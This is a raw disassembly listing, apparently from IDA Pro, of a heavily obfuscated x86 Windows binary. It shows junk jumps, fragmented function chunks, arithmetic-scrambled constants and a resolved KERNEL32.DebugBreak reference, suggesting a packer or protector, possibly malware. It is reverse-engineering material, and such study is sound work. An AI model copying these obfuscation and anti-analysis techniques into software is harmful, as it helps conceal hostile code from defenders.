; START OF FUNCTION CHUNK FOR sub_43178D
loc_42EBA7: ; CODE XREF: sub_43178D-36D�j
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_43178D
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42EBA9 proc near ; CODE XREF: sub_42E6B3+E�p
; sub_4306C9-1F87�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0042E061 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043076B SIZE 00000002 BYTES
; FUNCTION CHUNK AT 00430F08 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00431CCB SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00432768 SIZE 00000012 BYTES
push ebp
mov ebp, esp
jnb loc_42EC22
add esp, 0FFFFFFF4h
mov [ebp+var_8], edx
mov [ebp+var_4], eax
jmp loc_42EC0D
; ---------------------------------------------------------------------------
loc_42EBC0: ; DATA XREF: j8.b78ws:004304AC�o
neg eax
cmp ax, 0A5B3h
jnz loc_42FFD6
retn
; ---------------------------------------------------------------------------
loc_42EBCD: ; CODE XREF: sub_42ED88:loc_42FEB1�j
push edx
push 0
push eax
lea eax, sub_4327C0
push offset sub_431CB2
jmp j_nullsub_13
; ---------------------------------------------------------------------------
loc_42EBE1: ; CODE XREF: j8.b78ws:0042F857�j
; sub_431836+5�p
mov [esp+0Ch+var_C], ebx
pop ebx
mov al, 1
push offset sub_430E88
jmp sub_42EA38
; ---------------------------------------------------------------------------
adc ebp, 0A48A0DC8h
jmp sub_42EAFC
; ---------------------------------------------------------------------------
locret_42EBFC: ; CODE XREF: sub_42EBA9+5F�j
retn
; ---------------------------------------------------------------------------
loc_42EBFD: ; DATA XREF: sub_43119E-1595�o
add esi, 21E7F101h
push offset loc_431B70
jmp locret_42EBFC
; ---------------------------------------------------------------------------
loc_42EC0D: ; CODE XREF: sub_42EBA9+12�j
cmp [ebp+var_8], 0
jnz loc_430C33
mov eax, [ebp+var_4]
mov [ebp+var_8], eax
jmp loc_42E061
; ---------------------------------------------------------------------------
loc_42EC22: ; CODE XREF: sub_42EBA9+3�j
add esp, 0FFFFFFF4h
mov [ebp+var_8], edx
mov [ebp+var_4], eax
cmp [ebp+var_8], 0
jmp loc_431CCB
sub_42EBA9 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
jz loc_42FE2E
jmp sub_4321C5
; ---------------------------------------------------------------------------
shl ebx, 10h
test edx, ebx
jmp loc_42E7E9
; ---------------------------------------------------------------------------
locret_42EC49: ; CODE XREF: j8.b78ws:loc_430579�j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EA96
loc_42EC4A: ; CODE XREF: sub_42EA96+11�j
jmp loc_430673
; END OF FUNCTION CHUNK FOR sub_42EA96
; ---------------------------------------------------------------------------
loc_42EC4F: ; CODE XREF: j8.b78ws:0042E35A�j
jmp loc_42FAA7
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42EC54 proc near ; CODE XREF: sub_43082D-23D6�p
; sub_42E8EF+A�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0043185B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00432452 SIZE 00000024 BYTES
push ebp
mov ebp, esp
jb loc_43121C
add esp, 0FFFFFFE4h
jmp loc_432452
sub_42EC54 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EA8A
loc_42EC65: ; CODE XREF: sub_42EA8A+39C3�j
jb loc_432703
; END OF FUNCTION CHUNK FOR sub_42EA8A
; =============== S U B R O U T I N E =======================================
sub_42EC6B proc near ; CODE XREF: sub_430A75-F6A�p
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0042E2E8 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00431700 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00432245 SIZE 00000005 BYTES
xchg esi, [esp+0]
pop esi
jle loc_42ED99
mov eax, [ebp-4]
jmp loc_432245
sub_42EC6B endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_42EC7D proc near ; CODE XREF: sub_431E76-24A2�p
; j8.b78ws:004307BF�j
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0042FE82 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004320A5 SIZE 00000009 BYTES
mov [esp+0], edi
pop edi
xchg ecx, eax
mov esp, ebp
jmp loc_42FE82
sub_42EC7D endp ; sp-analysis failed
; ---------------------------------------------------------------------------
jb loc_43081E
jmp sub_432715
; ---------------------------------------------------------------------------
and eax, ecx
jmp loc_42E9C3
; =============== S U B R O U T I N E =======================================
sub_42EC9C proc near ; CODE XREF: j8.b78ws:0042FD89�j
; sub_431F17+6�p
; FUNCTION CHUNK AT 0042E94F SIZE 00000005 BYTES
xchg ebx, [esp+0]
pop ebx
call sub_42EAEB
jnz loc_42FCFD
mov ecx, [ebx+edx-4]
jmp loc_42E94F
sub_42EC9C endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_42ECB4 proc near ; CODE XREF: sub_42FFCD:loc_430CD7�p
; FUNCTION CHUNK AT 0042E18F SIZE 00000008 BYTES
mov [esp+0], esi
push 89B9AC68h
pop esi
and esi, 5BDEBC84h
add esi, 0F6AA3597h
jmp loc_42E18F
sub_42ECB4 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EB5A
loc_42ECCE: ; CODE XREF: sub_42EB5A+D�j
mov eax, ds:dword_4312A8
; END OF FUNCTION CHUNK FOR sub_42EB5A
; START OF FUNCTION CHUNK FOR sub_42FFCD
loc_42ECD4: ; CODE XREF: sub_42FFCD:loc_431609�j
or eax, eax
jnz loc_430A6C
jmp loc_430E54
; END OF FUNCTION CHUNK FOR sub_42FFCD
; =============== S U B R O U T I N E =======================================
sub_42ECE1 proc near ; DATA XREF: j8.b78ws:004324E5�o
; FUNCTION CHUNK AT 004310B7 SIZE 00000005 BYTES
add eax, [ebp-4]
xor edx, edx
push edx
push eax
jmp loc_4310B7
sub_42ECE1 endp
; ---------------------------------------------------------------------------
loc_42ECED: ; CODE XREF: j8.b78ws:00431FEA�j
adc edx, [esp+4]
add esp, 8
jmp loc_4311B0
; ---------------------------------------------------------------------------
cmp ebp, 0A52512D3h
jmp loc_430EA6
; =============== S U B R O U T I N E =======================================
sub_42ED04 proc near ; CODE XREF: sub_42E771�j
; DATA XREF: sub_42E10C:loc_42E767�o
mov eax, [ebp-20h]
call sub_430CB3
pop ecx
call sub_430B6F
sub_42ED04 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_43082D
loc_42ED12: ; CODE XREF: sub_43082D+3B6�j
jmp loc_4322EE
; END OF FUNCTION CHUNK FOR sub_43082D
; ---------------------------------------------------------------------------
mov ebp, 0EE870EE2h
jmp sub_430716
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4309F3
loc_42ED21: ; CODE XREF: sub_4309F3+B57�j
mov eax, [ebp-4]
mov al, [eax]
and al, 0F6h
cmp al, 0C2h
jz loc_42FBD3
call sub_42E32F
loc_42ED35: ; CODE XREF: j8.b78ws:00430E49�j
jmp loc_432235
; END OF FUNCTION CHUNK FOR sub_4309F3
; ---------------------------------------------------------------------------
loc_42ED3A: ; CODE XREF: j8.b78ws:00430D09�j
jo loc_4326ED
jno loc_4302CF
jle loc_430727
push 273927A0h
; START OF FUNCTION CHUNK FOR sub_42FAE7
loc_42ED51: ; CODE XREF: sub_42FAE7+12�j
add eax, 0FF7DE873h
mov eax, [eax]
or eax, eax
jnz loc_4312EE
jmp loc_4316EE
; END OF FUNCTION CHUNK FOR sub_42FAE7
; =============== S U B R O U T I N E =======================================
sub_42ED66 proc near ; DATA XREF: j8.b78ws:004318E8�o
mov edx, 17B3C1CFh
call sub_432702
push eax
rol eax, 12h
mov ds:dword_43008C, eax
retn
sub_42ED66 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4301DE
loc_42ED7B: ; CODE XREF: sub_4301DE:loc_430A92�j
; j8.b78ws:004318DD�j
ror eax, 12h
call sub_4315E4
; END OF FUNCTION CHUNK FOR sub_4301DE
; START OF FUNCTION CHUNK FOR sub_42F832
loc_42ED83: ; CODE XREF: sub_42F832+911�j
jmp loc_431AF3
; END OF FUNCTION CHUNK FOR sub_42F832
; =============== S U B R O U T I N E =======================================
sub_42ED88 proc near ; CODE XREF: sub_42FF6E-3E6�p
; j8.b78ws:0042FDAA�j
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0042E014 SIZE 00000023 BYTES
; FUNCTION CHUNK AT 0042E2F1 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0042E694 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042F77B SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0042F8B0 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0042F8E4 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0042FEB1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00430B2D SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00430CC1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043103D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00431149 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 004316FF SIZE 00000001 BYTES
; FUNCTION CHUNK AT 00431D45 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00431F28 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00432429 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0043247B SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00432521 SIZE 00000018 BYTES
xchg edx, [esp+0]
pop edx
call sub_42FBE2
test al, al
jnz loc_42E014
loc_42ED99: ; CODE XREF: sub_42EC6B+4�j
; sub_42ED88:loc_42F787�j ...
call sub_430905
loc_42ED9E: ; CODE XREF: sub_430734-367�j
jmp loc_42E021
sub_42ED88 endp ; sp-analysis failed
; [00000005 BYTES: COLLAPSED FUNCTION j_nullsub_16. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43119E
loc_42EDA8: ; CODE XREF: sub_43119E:loc_42F73C�j
add eax, 0A3C52013h
add eax, ebp
add eax, 0E033B71Dh
mov eax, [eax]
push offset sub_42EA28
jmp nullsub_56
; ---------------------------------------------------------------------------
loc_42EDC2: ; CODE XREF: sub_43119E:loc_430F55�j
mov eax, [ebp+8]
cmp dword ptr [eax-1Ch], 0F6h
jz loc_42EDE2
mov eax, [ebp+8]
cmp dword ptr [eax-1Ch], 0F7h
jnz loc_42E997
loc_42EDE2: ; CODE XREF: sub_43119E-23D2�j
; j8.b78ws:loc_42F92A�j ...
jno loc_430F72
push offset loc_43020D
jmp j_nullsub_70
; END OF FUNCTION CHUNK FOR sub_43119E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4327E5
loc_42EDF2: ; CODE XREF: sub_4327E5:loc_4309E8�j
mov eax, [eax-8]
or eax, 8
or eax, 10h
push offset loc_4311FB
jmp j_nullsub_77
; END OF FUNCTION CHUNK FOR sub_4327E5
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_42EE05 proc near ; CODE XREF: sub_42EA38�j
retn
sub_42EE05 endp
; [00000005 BYTES: COLLAPSED FUNCTION j_nullsub_25. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_42EE0B: ; DATA XREF: sub_42E598-E0�o
push 0
push eax
lea eax, sub_431804
push eax
jmp loc_42FFC2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_431CB2
loc_42EE1A: ; CODE XREF: sub_431CB2+14�j
xor edi, 0C087C479h
xchg edi, [esp+8+var_8]
push edx
pushf
push 5E02B2EBh
jmp loc_42FB15
; END OF FUNCTION CHUNK FOR sub_431CB2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43119E
loc_42EE2F: ; CODE XREF: sub_43119E:loc_4312C1�j
pop ebp
mov eax, ds:dword_4312B8
or eax, eax
jnz loc_42EE68
call sub_432300
push 6B7E9D05h
pop edx
rol edx, 15h
jmp loc_42E635
; END OF FUNCTION CHUNK FOR sub_43119E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_430C91
loc_42EE51: ; CODE XREF: sub_430C91:loc_42F757�j
jz loc_42EADE
add edi, 0A76068ABh
mov esi, 0E1DD5CFBh
pop edx
jmp loc_4301A7
; END OF FUNCTION CHUNK FOR sub_430C91
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43119E
loc_42EE68: ; CODE XREF: sub_42E873+8�j
; sub_43119E-2366�j
ror eax, 17h
push eax
push esi
push 0B71F562Fh
pop esi
jmp loc_42E2C9
; END OF FUNCTION CHUNK FOR sub_43119E
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_60. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_431640
loc_42EE79: ; CODE XREF: sub_431640:loc_43198E�j
pop eax
xor eax, 8422269Fh
rol eax, 0Dh
add eax, 0EB348EBAh
jmp loc_431935
; END OF FUNCTION CHUNK FOR sub_431640
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_431AFE
loc_42EE8E: ; CODE XREF: sub_431AFE+14�j
call sub_432702
push eax
rol eax, 15h
mov ds:dword_42E098, eax
retn
; END OF FUNCTION CHUNK FOR sub_431AFE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4301DE
loc_42EE9E: ; CODE XREF: sub_4301DE+8C1�j
jmp loc_42E7AE
; END OF FUNCTION CHUNK FOR sub_4301DE
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_42EEA3 proc near ; CODE XREF: sub_4302E0+3�j
jmp sub_4326B0
sub_42EEA3 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_431AFE
loc_42EEA8: ; CODE XREF: sub_431AFE+4�j
; sub_43217F+4�j
ror eax, 15h
jmp loc_42E7FC
; END OF FUNCTION CHUNK FOR sub_431AFE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_430148
loc_42EEB0: ; CODE XREF: sub_430148+750�j
pop ecx
mov edx, [ebp+arg_0]
push offset loc_431DD0
jmp j_nullsub_22
; END OF FUNCTION CHUNK FOR sub_430148
; =============== S U B R O U T I N E =======================================
sub_42EEBE proc near ; CODE XREF: sub_431804+3�p
push offset loc_4310BC
jmp j_nullsub_12
sub_42EEBE endp
; ---------------------------------------------------------------------------
loc_42EEC8: ; CODE XREF: j8.b78ws:loc_42E904�j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4314D8
loc_42EEC9: ; CODE XREF: sub_4314D8-149B�j
jmp loc_430FE9
; END OF FUNCTION CHUNK FOR sub_4314D8
; =============== S U B R O U T I N E =======================================
sub_42EECE proc near ; CODE XREF: j8.b78ws:0042E5E7�j
; sub_42EA8A+35CD�p
; FUNCTION CHUNK AT 00432508 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004327F7 SIZE 0000000F BYTES
mov [esp+0], eax
pop eax
add edx, ebx
rol edx, 5
xor edx, ecx
rol edx, 5
add edx, eax
rol edx, 5
jmp loc_432508
sub_42EECE endp ; sp-analysis failed
; ---------------------------------------------------------------------------
cmp esi, 5A5C2E4h
jmp loc_42EA90
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42FFCD
loc_42EEF1: ; CODE XREF: sub_42FFCD:loc_430E54�j
jz loc_430CD7
jmp loc_42E785
; END OF FUNCTION CHUNK FOR sub_42FFCD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4301B9
loc_42EEFC: ; CODE XREF: sub_4301B9+5FF�j
; sub_431085+19�j
inc dword ptr [ebp-4]
mov eax, [ebp+8]
mov eax, [eax-18h]
and eax, 7
mov [ebp-0Ch], eax
cmp dword ptr [ebp-10h], 0
jnz loc_430F55
push offset loc_430F44
jmp sub_4300E7
; END OF FUNCTION CHUNK FOR sub_4301B9
; ---------------------------------------------------------------------------
loc_42EF1F: ; CODE XREF: j8.b78ws:00430C0D�j
pop eax
add eax, 0E2E7F47h
xchg eax, [esp]
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43119E
loc_42EF2A: ; CODE XREF: sub_43119E-52A�j
jmp loc_4325DA
; END OF FUNCTION CHUNK FOR sub_43119E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_430BA0
loc_42EF2F: ; CODE XREF: sub_430BA0:loc_4314F2�j
push eax
push 0F4504BD5h
jmp loc_42E5B7
; END OF FUNCTION CHUNK FOR sub_430BA0
; ---------------------------------------------------------------------------
dw 5B51h
dword_42EF3C dd 4 dup(2), 0C0h, 40h, 2 dup(1), 4 dup(2), 0C0h, 40h
; DATA XREF: sub_42E14A+12�r
; sub_42E3FA�r ...
dd 2 dup(1), 4 dup(2), 0C0h, 40h, 2 dup(1), 4 dup(2), 0C0h
dd 40h, 2 dup(1), 4 dup(2), 0C0h, 40h, 0
dd 1, 4 dup(2), 0C0h, 40h, 0
dd 1, 4 dup(2), 0C0h, 40h, 0
dd 401h, 4 dup(2), 0C0h, 40h, 0
dd 23h dup(1), 2 dup(2), 4 dup(0)
dd 40h, 42h, 0C0h, 0C2h, 4 dup(1), 10h dup(1E00h), 0C2h
dd 42h, 2 dup(0C2h), 0Ch dup(2), 0Ah dup(1), 60h, 5 dup(1)
dd 4 dup(8), 4 dup(1), 0C0h, 40h, 6 dup(1), 8 dup(0C0h)
dd 8 dup(40h), 2 dup(1C2h), 20h, 1, 2 dup(2), 0C2h, 42h
dd 1E0h, 1, 20h, 2 dup(1), 0C0h, 2 dup(1), 4 dup(2), 2 dup(0C0h)
dd 2 dup(1), 8 dup(2), 4 dup(1A00h), 4 dup(0C0h), 800h
dd 0A00h, 60h, 1A00h, 4 dup(1), 0
dd 1, 2 dup(0)
dd 2 dup(1), 2 dup(2), 6 dup(1), 2 dup(2)
dword_42F33C dd 2 dd 3 dup(2), 1Ch dup(1), 5 dup(2), 1, 2, 19h dup(1), 10h dup(402h)
dd 10h dup(1), 0Bh dup(2), 3 dup(1), 2 dup(2), 1, 3 dup(0C2h)
dd 3 dup(2), 7 dup(1), 2 dup(2), 10h dup(0E00h), 10h dup(402h)
dd 3 dup(1), 2, 1C2h, 3 dup(2), 3 dup(1), 2, 1C2h, 0Bh dup(2)
dd 2 dup(1), 1C2h, 7 dup(2), 5 dup(1), 2, 9 dup(1), 3 dup(2)
dd 1, 2, 2 dup(1), 2 dup(2), 1, 3 dup(2), 1, 2, 1, 2 dup(2)
dd 2 dup(1), 2, 2 dup(1), 2 dup(2), 1, 3 dup(2), 1, 2
dd 1, 3 dup(2), 1, 2, 2 dup(1), 3 dup(2), 1, 3 dup(2)
dd 1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43119E
loc_42F73C: ; CODE XREF: sub_43119E+FA4�j
jmp loc_42EDA8
; END OF FUNCTION CHUNK FOR sub_43119E
; ---------------------------------------------------------------------------
db 34h, 0CBh, 8
dword_42F744 dd 7C859B72h ; resolved to->KERNEL32.DebugBreak; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E873
loc_42F748: ; CODE XREF: sub_42E873+3BB1�j
jmp loc_431E41
; END OF FUNCTION CHUNK FOR sub_42E873
; ---------------------------------------------------------------------------
loc_42F74D: ; CODE XREF: j8.b78ws:00431FF4�j
jmp loc_431175
; [00000005 BYTES: COLLAPSED FUNCTION j_nullsub_95. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_430C91
loc_42F757: ; CODE XREF: sub_430C91-12CE�j
jmp loc_42EE51
; END OF FUNCTION CHUNK FOR sub_430C91
; ---------------------------------------------------------------------------
byte_42F75C db 1 ; DATA XREF: sub_4325FC:loc_4304F5�r
; sub_43157B+6�r ...
db 7Fh, 2Fh, 75h
dword_42F760 dd 0D8233A6Eh, 6C642E6Ch, 0C1F7001Bh, 8FE53578h, 2AD5E9h
; DATA XREF: sub_42E857�o
; sub_43157B-51D�o
db 0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_11. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4316B9
loc_42F776: ; CODE XREF: sub_4316B9+D�j
call sub_431616
; END OF FUNCTION CHUNK FOR sub_4316B9
; START OF FUNCTION CHUNK FOR sub_42ED88
loc_42F77B: ; CODE XREF: sub_42ED88+2FCF�j
add eax, [ebp-4]
add eax, 5
cmp eax, ds:dword_432510
loc_42F787: ; CODE XREF: j8.b78ws:004308E1�j
jz loc_42ED99
jmp loc_431149
; END OF FUNCTION CHUNK FOR sub_42ED88
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_431651
loc_42F792: ; CODE XREF: sub_431651:loc_430E60�j
call sub_42E174
; END OF FUNCTION CHUNK FOR sub_431651
; START OF FUNCTION CHUNK FOR sub_43145D
loc_42F797: ; CODE XREF: sub_43145D+17C�j
jmp loc_43029F
; END OF FUNCTION CHUNK FOR sub_43145D
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_90. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43119E
loc_42F79D: ; CODE XREF: sub_43119E+15C5�j
jmp loc_42F9B2
; END OF FUNCTION CHUNK FOR sub_43119E
; ---------------------------------------------------------------------------
loc_42F7A2: ; DATA XREF: sub_42E1B3+2BE2�o
call sub_432702
push 0A2199DFCh
mov [esp], eax
rol eax, 1Ch
call sub_430716
; START OF FUNCTION CHUNK FOR sub_42E1B3
loc_42F7B7: ; CODE XREF: sub_42E1B3+B�j
jmp loc_4306DA
; END OF FUNCTION CHUNK FOR sub_42E1B3
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_36. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
push ecx
jmp sub_43236F
; ---------------------------------------------------------------------------
loc_42F7C3: ; CODE XREF: j8.b78ws:0042EB80�j
mov edx, [ebp-8]
mov [edx], al
mov eax, [ebp-8]
mov al, [eax]
add [ebp-0Ah], al
jmp loc_432568
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E6B3
loc_42F7D5: ; CODE XREF: sub_42E6B3:loc_4324F6�j
call sub_4325FC
call nullsub_5
; END OF FUNCTION CHUNK FOR sub_42E6B3
; START OF FUNCTION CHUNK FOR sub_4306C9
loc_42F7DF: ; CODE XREF: sub_4306C9-1F95�j
; sub_431908+14�j
mov eax, ds:dword_42E080
push offset loc_430EC6
jmp loc_430E73
; END OF FUNCTION CHUNK FOR sub_4306C9
; ---------------------------------------------------------------------------
loc_42F7EE: ; CODE XREF: j8.b78ws:loc_431FBF�j
add eax, 6CA3D42Bh
add eax, ebp
; START OF FUNCTION CHUNK FOR sub_43119E
loc_42F7F6: ; CODE XREF: sub_43119E-E22�j
add eax, 30CD6D0Fh
mov eax, [eax]
xchg eax, [esp+10h+var_10]
jmp loc_42E615
; END OF FUNCTION CHUNK FOR sub_43119E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43038C
loc_42F806: ; CODE XREF: sub_43038C+D�j
mov [ebp-8], eax
mov eax, [ebp+8]
test byte ptr [eax-8], 10h
jz loc_430159
inc dword ptr [ebp-8]
; END OF FUNCTION CHUNK FOR sub_43038C
; START OF FUNCTION CHUNK FOR sub_42F886
loc_42F819: ; CODE XREF: sub_42F886:loc_42F88E�j
; sub_43038C-219�j
mov eax, [ebp-8]
jmp loc_4311C8
; END OF FUNCTION CHUNK FOR sub_42F886
; ---------------------------------------------------------------------------
loc_42F821: ; CODE XREF: j8.b78ws:0042FA48�j
pop edi
loc_42F822: ; CODE XREF: j8.b78ws:loc_42FA3A�j
sub ecx, 7E7F0DFFh
push offset sub_431EA7
jmp locret_4303EC
; =============== S U B R O U T I N E =======================================
sub_42F832 proc near ; CODE XREF: sub_42E10C:loc_431962�p
; j8.b78ws:00432677�j
; FUNCTION CHUNK AT 0042ED83 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042FE9C SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00430140 SIZE 00000008 BYTES
xchg edi, [esp+0]
pop edi
test byte ptr [ebp-8], 20h
jz loc_42FE9C
push ebp
mov eax, [ebp-20h]
call sub_430148
pop ecx
jmp loc_430140
sub_42F832 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
xor ebp, eax
jbe loc_431E47
jmp loc_42EBE1
; ---------------------------------------------------------------------------
locret_42F85C: ; CODE XREF: j8.b78ws:004324EA�j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E1FD
loc_42F85D: ; CODE XREF: sub_42E1FD+18�j
mov esp, ebp
pop ebp
push ds:dword_432504
retn
; END OF FUNCTION CHUNK FOR sub_42E1FD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4321C5
loc_42F867: ; CODE XREF: sub_4321C5+300�j
jmp loc_430D21
; END OF FUNCTION CHUNK FOR sub_4321C5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_431F6D
loc_42F86C: ; CODE XREF: sub_431F6D-1E32�j
jmp loc_4322D0
; END OF FUNCTION CHUNK FOR sub_431F6D
; [00000005 BYTES: COLLAPSED FUNCTION j_nullsub_80. PRESS KEYPAD "+" TO EXPAND]
; [00000005 BYTES: COLLAPSED FUNCTION j_nullsub_13. PRESS KEYPAD "+" TO EXPAND]
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_64. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_42F87C: ; CODE XREF: j8.b78ws:00430F6D�j
jmp loc_4314C7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E4AA
loc_42F881: ; CODE XREF: sub_42E4AA+6�j
jmp loc_42E77A
; END OF FUNCTION CHUNK FOR sub_42E4AA
; =============== S U B R O U T I N E =======================================
sub_42F886 proc near ; DATA XREF: sub_42E174+1A4E�o
; FUNCTION CHUNK AT 0042F819 SIZE 00000008 BYTES
cmp byte ptr [eax], 0
call sub_43131C
loc_42F88E: ; CODE XREF: sub_43038C-222�j
jmp loc_42F819
sub_42F886 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42F893 proc near ; CODE XREF: sub_431F8C+8�p
; FUNCTION CHUNK AT 0042FA40 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042FC27 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0042FD2A SIZE 00000012 BYTES
push ebp
mov ebp, esp
push ecx
mov esp, ebp
loc_42F899: ; CODE XREF: j8.b78ws:0042E5EF�j
jmp loc_42FD2A
sub_42F893 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_75. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_42F89F: ; CODE XREF: j8.b78ws:0042FD65�j
jmp locret_4311D8
; ---------------------------------------------------------------------------
loc_42F8A4: ; CODE XREF: j8.b78ws:0042E5FC�j
jl loc_43202C
; START OF FUNCTION CHUNK FOR sub_4319CA
loc_42F8AA: ; CODE XREF: sub_4319CA:loc_42FE1B�j
or ebx, 0D70FAAA3h
; END OF FUNCTION CHUNK FOR sub_4319CA
; START OF FUNCTION CHUNK FOR sub_42ED88
loc_42F8B0: ; CODE XREF: sub_42ED88+B73�j
xor ebx, 0FFBFEFF7h
loc_42F8B6: ; CODE XREF: j8.b78ws:loc_431624�j
xchg ebx, [esp-4+arg_0]
mov edx, esp
jmp loc_42FEB1
; END OF FUNCTION CHUNK FOR sub_42ED88
; =============== S U B R O U T I N E =======================================
sub_42F8C0 proc near ; DATA XREF: sub_4302AC-7D0�o
; FUNCTION CHUNK AT 00432207 SIZE 00000002 BYTES
push ecx
push 57D9C841h
pop ecx
xor ecx, 0AC2FA54Fh
add ecx, 44C938Ah
mov [ecx], eax
jmp loc_432207
sub_42F8C0 endp
; ---------------------------------------------------------------------------
push 0BEC24FD9h
jmp loc_431F52
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42ED88
loc_42F8E4: ; CODE XREF: sub_42ED88:loc_42E694�j
cmp eax, 66h
jnz loc_43247B
mov eax, [ebp-4]
cmp word ptr [eax], 2ECDh
jz loc_43247B
jmp loc_42F8B0
; END OF FUNCTION CHUNK FOR sub_42ED88
; ---------------------------------------------------------------------------
jmp loc_431D8D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43058C
loc_42F905: ; CODE XREF: sub_43058C+1A8F�j
push edx
sub ebx, 0B9374E16h
xor edi, ebx
; END OF FUNCTION CHUNK FOR sub_43058C
; START OF FUNCTION CHUNK FOR sub_42FC8B
loc_42F90E: ; CODE XREF: sub_42FC8B:loc_43070B�j
push 0
push 0
push offset loc_430FC4
jmp nullsub_19
; END OF FUNCTION CHUNK FOR sub_42FC8B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_430BA0
loc_42F91C: ; CODE XREF: sub_430BA0-C42�j
jno loc_4326DE
popf
test ebp, esi
jmp loc_4314F2
; END OF FUNCTION CHUNK FOR sub_430BA0
; ---------------------------------------------------------------------------
